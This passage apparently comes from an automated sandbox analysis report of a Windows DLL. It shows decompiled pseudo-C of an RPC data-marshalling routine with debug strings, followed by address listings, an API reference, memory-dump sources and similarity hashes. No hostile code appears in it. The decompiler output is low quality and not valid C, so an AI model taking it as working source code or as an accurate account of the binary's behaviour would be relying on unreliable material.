                                                                                                									__edx =  *(__ebp + 8);
                                                                                                									E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 8) =  *(__ebp + 0xc);
                                                                                                									__eax =  *(__ebp + 0xc) + 8;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 5:
                                                                                                									L13:
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__esp = __esp - 8;
                                                                                                									asm("movsd xmm0, [edx]");
                                                                                                									asm("movsd [esp], xmm0");
                                                                                                									_push("double=%f <= %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0x10;
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 8);
                                                                                                									__eax = E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 8);
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 6:
                                                                                                									L6:
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									 *(__ebp - 4) =  *( *(__ebp + 0xc));
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__eax =  *( *(__ebp + 0xc));
                                                                                                									_push( *( *(__ebp + 0xc)));
                                                                                                									_push("enum16=%d <= %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									if( *( *(__ebp + 0xc)) > 0x7fff) {
                                                                                                										_push(0x6f5);
                                                                                                										__imp__RpcRaiseException();
                                                                                                									}
                                                                                                									L8:
                                                                                                									__edx = __ebp - 4;
                                                                                                									 *(__ebp + 8) = E6EDAB030( *(__ebp + 8), __ebp - 4, 2);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 7:
                                                                                                									L14:
                                                                                                									 *(__ebp - 0x18) = 0;
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__edx =  *( *(__ebp + 0xc));
                                                                                                									_push( *( *(__ebp + 0xc)));
                                                                                                									_push("pointer=%p <= %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__eax =  *(__ebp + 8);
                                                                                                									__ecx =  *(__eax + 4);
                                                                                                									_push( *(__eax + 4));
                                                                                                									_push("pStubMsg->Buffer before %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 8;
                                                                                                									__edx =  *(__ebp + 0x10);
                                                                                                									__eax =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                                									if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
                                                                                                										__ecx =  *(__ebp + 0x10);
                                                                                                										 *(__ebp + 0x14) =  *(__ebp + 0x10);
                                                                                                									}
                                                                                                									__edx =  *(__ebp + 0x14);
                                                                                                									__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                                									if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
                                                                                                										__ecx =  *(__ebp + 8);
                                                                                                										__ecx =  *(__ebp + 8) + 4;
                                                                                                										__eax = E6EDA7400( *(__ebp + 8) + 4,  *(__ebp + 8) + 4, 4);
                                                                                                									}
                                                                                                									__edx =  *(__ebp + 8);
                                                                                                									__eax =  *(__edx + 4);
                                                                                                									 *(__ebp - 0x1c) =  *(__edx + 4);
                                                                                                									__ecx =  *(__ebp + 8);
                                                                                                									if( *( *(__ebp + 8) + 0x34) == 0) {
                                                                                                										__eax =  *(__ebp + 0x14);
                                                                                                										__ecx =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                                										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
                                                                                                											__edx =  *(__ebp + 8);
                                                                                                											__eax = E6EDAAF00( *(__ebp + 8), 4);
                                                                                                										}
                                                                                                									} else {
                                                                                                										__edx =  *(__ebp + 8);
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										__ecx =  *(__eax + 0x34);
                                                                                                										 *( *(__ebp + 8) + 4) =  *(__eax + 0x34);
                                                                                                										__edx =  *(__ebp + 8);
                                                                                                										 *( *(__ebp + 8) + 0x34) = 0;
                                                                                                										 *(__ebp - 0x18) = 1;
                                                                                                									}
                                                                                                									__eax =  *(__ebp + 0x14);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__edx =  *( *(__ebp + 0xc));
                                                                                                									__eax =  *(__ebp - 0x1c);
                                                                                                									__ecx =  *(__ebp + 8);
                                                                                                									__eax = E6EDAB220( *(__ebp + 8),  *(__ebp - 0x1c),  *( *(__ebp + 0xc)),  *(__ebp + 0x14));
                                                                                                									if( *(__ebp - 0x18) == 0) {
                                                                                                										L28:
                                                                                                										__edx =  *(__ebp + 8);
                                                                                                										__eax =  *(__edx + 4);
                                                                                                										_push( *(__edx + 4));
                                                                                                										_push("pStubMsg->Buffer after %p\n");
                                                                                                										0x6eda0000();
                                                                                                										__esp = __esp + 8;
                                                                                                										__ecx =  *(__ebp + 0x10);
                                                                                                										__edx =  *__ecx & 0x000000ff;
                                                                                                										if(( *__ecx & 0x000000ff) != 0x36) {
                                                                                                											__ecx =  *(__ebp + 0x10);
                                                                                                											__ecx =  *(__ebp + 0x10) + 4;
                                                                                                											 *(__ebp + 0x10) = __ecx;
                                                                                                										} else {
                                                                                                											 *(__ebp + 0x14) =  *(__ebp + 0x14) + 4;
                                                                                                											 *(__ebp + 0x14) =  *(__ebp + 0x14) + 4;
                                                                                                										}
                                                                                                										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                										while(1) {
                                                                                                											L44:
                                                                                                											 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
                                                                                                											goto L1;
                                                                                                										}
                                                                                                									} else {
                                                                                                										do {
                                                                                                											L23:
                                                                                                											__edx =  *(__ebp + 8);
                                                                                                											__eax =  *(__edx + 0x14);
                                                                                                											_push( *(__edx + 0x14));
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											__edx =  *( *(__ebp + 8));
                                                                                                											__eax =  *(__ebp + 8);
                                                                                                											 *(__eax + 4) =  *(__eax + 4) -  *(__edx + 8);
                                                                                                											_push( *(__eax + 4) -  *(__edx + 8));
                                                                                                											_push("buffer=%d/%d\n");
                                                                                                											0x6eda0000();
                                                                                                											__esp = __esp + 0xc;
                                                                                                											__edx =  *(__ebp + 8);
                                                                                                											__eax =  *( *(__ebp + 8));
                                                                                                											__ecx =  *(__eax + 8);
                                                                                                											__edx =  *(__ebp + 8);
                                                                                                											__ecx =  *(__eax + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
                                                                                                											__eax =  *(__ebp + 8);
                                                                                                											if( *( *(__ebp + 8) + 4) > __ecx) {
                                                                                                												__ecx =  *(__ebp + 8);
                                                                                                												__edx =  *( *(__ebp + 8));
                                                                                                												__eax =  *(__edx + 8);
                                                                                                												__ecx =  *(__ebp + 8);
                                                                                                												__eax =  *(__edx + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
                                                                                                												__edx =  *(__ebp + 8);
                                                                                                												 *(__edx + 4) =  *(__edx + 4) - __eax;
                                                                                                												_push( *(__edx + 4) - __eax);
                                                                                                												_push("buffer overflow %d bytes\n");
                                                                                                												0x6eda0000();
                                                                                                												__esp = __esp + 8;
                                                                                                											}
                                                                                                											__edx = 0;
                                                                                                										} while (0 != 0);
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										__ecx =  *(__ebp + 8);
                                                                                                										__edx =  *(__ecx + 4);
                                                                                                										 *( *(__ebp + 8) + 0x34) =  *(__ecx + 4);
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										__ecx =  *(__ebp - 0x1c);
                                                                                                										 *( *(__ebp + 8) + 4) =  *(__ebp - 0x1c);
                                                                                                										__edx =  *(__ebp + 0x14);
                                                                                                										__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                                										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											__eax = E6EDAAF00( *(__ebp + 8), 4);
                                                                                                										}
                                                                                                										goto L28;
                                                                                                									}
                                                                                                								case 8:
                                                                                                									L32:
                                                                                                									__eax =  *(__ebp - 0x10);
                                                                                                									__ecx = __ebp + 0xc;
                                                                                                									__eax = E6EDA7450(__ecx, __ecx,  *(__ebp - 0x10), 2);
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 9:
                                                                                                									L33:
                                                                                                									__edx =  *(__ebp - 0x10);
                                                                                                									__ebp + 0xc = E6EDA7450(__ecx, __ebp + 0xc,  *(__ebp - 0x10), 4);
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xa:
                                                                                                									L34:
                                                                                                									__ecx =  *(__ebp - 0x10);
                                                                                                									__edx = __ebp + 0xc;
                                                                                                									__eax = E6EDA7450(__ecx, __ebp + 0xc, __ecx, 8);
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xb:
                                                                                                									goto L0;
                                                                                                								case 0xc:
                                                                                                									L35:
                                                                                                									1 = 1 << 0;
                                                                                                									__edx =  *(__ebp + 0x10);
                                                                                                									 *(__edx + (1 << 0)) & 0x000000ff = ( *(__edx + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 0xc) = ( *(__edx + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									__edx =  *(__ebp + 0x10);
                                                                                                									 *( *(__ebp + 0x10)) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
                                                                                                									 *(__ebp - 8) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
                                                                                                									__ecx =  *(__ebp - 8);
                                                                                                									__edx =  *(__ebp + 8);
                                                                                                									 *(__ebp - 0x20) = E6EDAE3A0( *(__ebp + 8),  *(__ebp - 8));
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__ecx =  *(__ebp - 0x20);
                                                                                                									_push( *(__ebp - 0x20));
                                                                                                									_push("embedded complex (size=%d) <= %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__edx =  *(__ebp - 8);
                                                                                                									__eax =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                                									__eax =  *( *(__ebp - 8)) & 0x7f;
                                                                                                									__ecx =  *(0x6edbb218 + __eax * 4);
                                                                                                									 *(__ebp - 0x14) =  *(0x6edbb218 + __eax * 4);
                                                                                                									if( *(__ebp - 0x14) == 0) {
                                                                                                										__edx =  *(__ebp - 8);
                                                                                                										__eax =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                                										_push( *( *(__ebp - 8)) & 0x000000ff);
                                                                                                										_push("no marshaller for embedded type %02x\n");
                                                                                                										0x6eda0000();
                                                                                                										__esp = __esp + 8;
                                                                                                									} else {
                                                                                                										__edx =  *(__ebp - 8);
                                                                                                										__eax =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                                										if(( *( *(__ebp - 8)) & 0x000000ff) != 0x2f) {
                                                                                                											__edx =  *(__ebp - 8);
                                                                                                											_push( *(__ebp - 8));
                                                                                                											__eax =  *(__ebp + 0xc);
                                                                                                											_push( *(__ebp + 0xc));
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											_push( *(__ebp + 8));
                                                                                                											__eax =  *(__ebp - 0x14)();
                                                                                                										} else {
                                                                                                											__ecx =  *(__ebp - 8);
                                                                                                											_push( *(__ebp - 8));
                                                                                                											__edx =  *(__ebp + 0xc);
                                                                                                											__eax =  *( *(__ebp + 0xc));
                                                                                                											_push( *( *(__ebp + 0xc)));
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											_push( *(__ebp + 8));
                                                                                                											__eax =  *(__ebp - 0x14)();
                                                                                                										}
                                                                                                									}
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) +  *(__ebp - 0x20);
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									goto L1;
                                                                                                								case 0xd:
                                                                                                									L42:
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xe:
                                                                                                									L10:
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__eax =  *( *(__ebp + 0xc));
                                                                                                									 *(__ebp - 0x24) =  *( *(__ebp + 0xc));
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__eax =  *( *(__ebp + 0xc));
                                                                                                									_push( *( *(__ebp + 0xc)));
                                                                                                									_push("int3264=%ld <= %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__ecx = __ebp - 0x24;
                                                                                                									__edx =  *(__ebp + 8);
                                                                                                									E6EDAB030( *(__ebp + 8), __ebp - 0x24, 4) =  *(__ebp + 0xc);
                                                                                                									__eax =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xf:
                                                                                                									goto L43;
                                                                                                							}
                                                                                                						}
                                                                                                						return  *(_t204 + 0xc);
                                                                                                					}
                                                                                                				}
                                                                                                			}





                                                                                                0x6eda9024
                                                                                                0x6eda902c
                                                                                                0x6eda9034
                                                                                                0x6eda9037
                                                                                                0x6eda903a
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda917c
                                                                                                0x6eda917c
                                                                                                0x6eda9183
                                                                                                0x6eda9186
                                                                                                0x6eda9187
                                                                                                0x6eda918a
                                                                                                0x6eda918c
                                                                                                0x6eda918d
                                                                                                0x6eda9192
                                                                                                0x6eda9197
                                                                                                0x6eda919a
                                                                                                0x6eda919d
                                                                                                0x6eda91a0
                                                                                                0x6eda91a1
                                                                                                0x6eda91a6
                                                                                                0x6eda91ab
                                                                                                0x6eda91ae
                                                                                                0x6eda91b1
                                                                                                0x6eda91b7
                                                                                                0x6eda91b9
                                                                                                0x6eda91bc
                                                                                                0x6eda91bc
                                                                                                0x6eda91bf
                                                                                                0x6eda91c2
                                                                                                0x6eda91c8
                                                                                                0x6eda91cc
                                                                                                0x6eda91cf
                                                                                                0x6eda91d3
                                                                                                0x6eda91d8
                                                                                                0x6eda91db
                                                                                                0x6eda91de
                                                                                                0x6eda91e1
                                                                                                0x6eda91e4
                                                                                                0x6eda91eb
                                                                                                0x6eda920c
                                                                                                0x6eda920f
                                                                                                0x6eda9215
                                                                                                0x6eda9219
                                                                                                0x6eda921d
                                                                                                0x6eda9222
                                                                                                0x6eda91ed
                                                                                                0x6eda91ed
                                                                                                0x6eda91f0
                                                                                                0x6eda91f3
                                                                                                0x6eda91f6
                                                                                                0x6eda91f9
                                                                                                0x6eda91fc
                                                                                                0x6eda9203
                                                                                                0x6eda9203
                                                                                                0x6eda9225
                                                                                                0x6eda9229
                                                                                                0x6eda922c
                                                                                                0x6eda922f
                                                                                                0x6eda9233
                                                                                                0x6eda9237
                                                                                                0x6eda9243
                                                                                                0x6eda92d8
                                                                                                0x6eda92d8
                                                                                                0x6eda92db
                                                                                                0x6eda92de
                                                                                                0x6eda92df
                                                                                                0x6eda92e4
                                                                                                0x6eda92e9
                                                                                                0x6eda92ec
                                                                                                0x6eda92ef
                                                                                                0x6eda92f5
                                                                                                0x6eda9302
                                                                                                0x6eda9305
                                                                                                0x6eda9308
                                                                                                0x6eda92f7
                                                                                                0x6eda92fa
                                                                                                0x6eda92fd
                                                                                                0x6eda92fd
                                                                                                0x6eda930e
                                                                                                0x6eda9311
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x6eda9249
                                                                                                0x6eda9249
                                                                                                0x6eda9249
                                                                                                0x6eda9249
                                                                                                0x6eda924c
                                                                                                0x6eda924f
                                                                                                0x6eda9250
                                                                                                0x6eda9253
                                                                                                0x6eda9255
                                                                                                0x6eda925b
                                                                                                0x6eda925e
                                                                                                0x6eda925f
                                                                                                0x6eda9264
                                                                                                0x6eda9269
                                                                                                0x6eda926c
                                                                                                0x6eda926f
                                                                                                0x6eda9271
                                                                                                0x6eda9274
                                                                                                0x6eda9277
                                                                                                0x6eda927a
                                                                                                0x6eda9280
                                                                                                0x6eda9282
                                                                                                0x6eda9285
                                                                                                0x6eda9287
                                                                                                0x6eda928a
                                                                                                0x6eda928d
                                                                                                0x6eda9290
                                                                                                0x6eda9296
                                                                                                0x6eda9298
                                                                                                0x6eda9299
                                                                                                0x6eda929e
                                                                                                0x6eda92a3
                                                                                                0x6eda92a3
                                                                                                0x6eda92a6
                                                                                                0x6eda92a6
                                                                                                0x6eda92aa
                                                                                                0x6eda92ad
                                                                                                0x6eda92b0
                                                                                                0x6eda92b3
                                                                                                0x6eda92b6
                                                                                                0x6eda92b9
                                                                                                0x6eda92bc
                                                                                                0x6eda92bf
                                                                                                0x6eda92c2
                                                                                                0x6eda92c8
                                                                                                0x6eda92cc
                                                                                                0x6eda92d0
                                                                                                0x6eda92d5
                                                                                                0x00000000
                                                                                                0x6eda92c8
                                                                                                0x00000000
                                                                                                0x6eda9319
                                                                                                0x6eda931b
                                                                                                0x6eda931f
                                                                                                0x6eda9323
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda9330
                                                                                                0x6eda9332
                                                                                                0x6eda933a
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda9347
                                                                                                0x6eda9349
                                                                                                0x6eda934d
                                                                                                0x6eda9351
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda9373
                                                                                                0x6eda9378
                                                                                                0x6eda937b
                                                                                                0x6eda9382
                                                                                                0x6eda9385
                                                                                                0x6eda938b
                                                                                                0x6eda938e
                                                                                                0x6eda9391
                                                                                                0x6eda9397
                                                                                                0x6eda939a
                                                                                                0x6eda939d
                                                                                                0x6eda93a1
                                                                                                0x6eda93ad
                                                                                                0x6eda93b0
                                                                                                0x6eda93b3
                                                                                                0x6eda93b4
                                                                                                0x6eda93b7
                                                                                                0x6eda93b8
                                                                                                0x6eda93bd
                                                                                                0x6eda93c2
                                                                                                0x6eda93c5
                                                                                                0x6eda93c8
                                                                                                0x6eda93cb
                                                                                                0x6eda93ce
                                                                                                0x6eda93d5
                                                                                                0x6eda93dc
                                                                                                0x6eda940d
                                                                                                0x6eda9410
                                                                                                0x6eda9413
                                                                                                0x6eda9414
                                                                                                0x6eda9419
                                                                                                0x6eda941e
                                                                                                0x6eda93de
                                                                                                0x6eda93de
                                                                                                0x6eda93e1
                                                                                                0x6eda93e7
                                                                                                0x6eda93fc
                                                                                                0x6eda93ff
                                                                                                0x6eda9400
                                                                                                0x6eda9403
                                                                                                0x6eda9404
                                                                                                0x6eda9407
                                                                                                0x6eda9408
                                                                                                0x6eda93e9
                                                                                                0x6eda93e9
                                                                                                0x6eda93ec
                                                                                                0x6eda93ed
                                                                                                0x6eda93f0
                                                                                                0x6eda93f2
                                                                                                0x6eda93f3
                                                                                                0x6eda93f6
                                                                                                0x6eda93f7
                                                                                                0x6eda93f7
                                                                                                0x6eda940b
                                                                                                0x6eda9421
                                                                                                0x6eda9424
                                                                                                0x6eda9427
                                                                                                0x6eda942d
                                                                                                0x6eda9430
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda9438
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda9079
                                                                                                0x6eda9079
                                                                                                0x6eda907c
                                                                                                0x6eda907e
                                                                                                0x6eda9081
                                                                                                0x6eda9084
                                                                                                0x6eda9085
                                                                                                0x6eda9088
                                                                                                0x6eda908a
                                                                                                0x6eda908b
                                                                                                0x6eda9090
                                                                                                0x6eda9095
                                                                                                0x6eda909a
                                                                                                0x6eda909e
                                                                                                0x6eda90aa
                                                                                                0x6eda90ad
                                                                                                0x6eda90b0
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda8f74
                                                                                                0x6eda9462
                                                                                                0x6eda9462
                                                                                                0x6eda944e

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F5), ref: 6EDA901C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: buffer overflow %d bytes$buffer=%d/%d$byte=%d <= %p$double=%f <= %p$enum16=%d <= %p$float=%f <= %p$long=%d <= %p$longlong=%s <= %p$pStubMsg->Buffer after %p$pStubMsg->Buffer before %p$pointer=%p <= %p$short=%d <= %p
                                                                                                • API String ID: 3997070919-1788898343
                                                                                                • Opcode ID: 23915ac8d14f401e7395780f2df491c297a81970f661584118bde5d08766494d
                                                                                                • Instruction ID: ab09e189f60a6679f989a275a92972373ae9931dce20779abfb7fe9420abfcb1
                                                                                                • Opcode Fuzzy Hash: 23915ac8d14f401e7395780f2df491c297a81970f661584118bde5d08766494d
                                                                                                • Instruction Fuzzy Hash: 42D14BB9A00109AFCB04CF98D890EAA7B76FF89354F14C518FA194F345E731EA51CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 16%
                                                                                                			E6EDA9438() {
                                                                                                				void* _t200;
                                                                                                				void* _t202;
                                                                                                
                                                                                                				L0:
                                                                                                				while(1) {
                                                                                                					L0:
                                                                                                					while(1) {
                                                                                                						L44:
                                                                                                						 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
                                                                                                						L1:
                                                                                                						while(( *( *(_t200 + 0x10)) & 0x000000ff) != 0x5b) {
                                                                                                							 *(_t200 - 0xc) =  *( *(_t200 + 0x10)) & 0x000000ff;
                                                                                                							 *(_t200 - 0xc) =  *(_t200 - 0xc) - 1;
                                                                                                							if( *(_t200 - 0xc) > 0xb8) {
                                                                                                								L43:
                                                                                                								0x6eda0000("unhandled format 0x%02x\n",  *( *(_t200 + 0x10)) & 0x000000ff);
                                                                                                								_t202 = _t202 + 8;
                                                                                                								while(1) {
                                                                                                									L44:
                                                                                                									 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
                                                                                                									goto L1;
                                                                                                								}
                                                                                                							}
                                                                                                							L3:
                                                                                                							_t8 =  *(_t200 - 0xc) + 0x6eda94a4; // 0xcccccc0e
                                                                                                							switch( *((intOrPtr*)(( *_t8 & 0x000000ff) * 4 +  &M6EDA9464))) {
                                                                                                								case 0:
                                                                                                									L4:
                                                                                                									_push( *(_t200 + 0xc));
                                                                                                									_push( *( *(_t200 + 0xc)) & 0x0000ffff);
                                                                                                									_push("byte=%d <= %p\n");
                                                                                                									0x6eda0000();
                                                                                                									E6EDAB030( *((intOrPtr*)(_t200 + 8)),  *(_t200 + 0xc), 1);
                                                                                                									_t202 = _t202 + 0x18;
                                                                                                									 *(_t200 + 0xc) =  &(( *(_t200 + 0xc))[0]);
                                                                                                									L44:
                                                                                                									 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
                                                                                                									goto L1;
                                                                                                								case 1:
                                                                                                									L5:
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                                                                                                									_push( *( *(__ebp + 0xc)) & 0x0000ffff);
                                                                                                									_push("short=%d <= %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 8) = E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 2);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 2;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 2:
                                                                                                									L9:
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *( *(__ebp + 0xc));
                                                                                                									_push( *( *(__ebp + 0xc)));
                                                                                                									_push("long=%d <= %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 8) = E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 4);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 3:
                                                                                                									L11:
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									asm("cvtss2sd xmm0, [edx]");
                                                                                                									__esp = __esp - 8;
                                                                                                									asm("movsd [esp], xmm0");
                                                                                                									_push("float=%f <= %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0x10;
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 8);
                                                                                                									__eax = E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 4);
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t200 + 0x10) =  &(( *(_t200 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 4:
                                                                                                									L12:
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__edx =  *(__ecx + 4);
                                                                                                									_push( *(__ecx + 4));
                                                                                                									__eax =  *__ecx;
                                                                                                									_push(__eax);
                                                                                                									0x6eda0000();
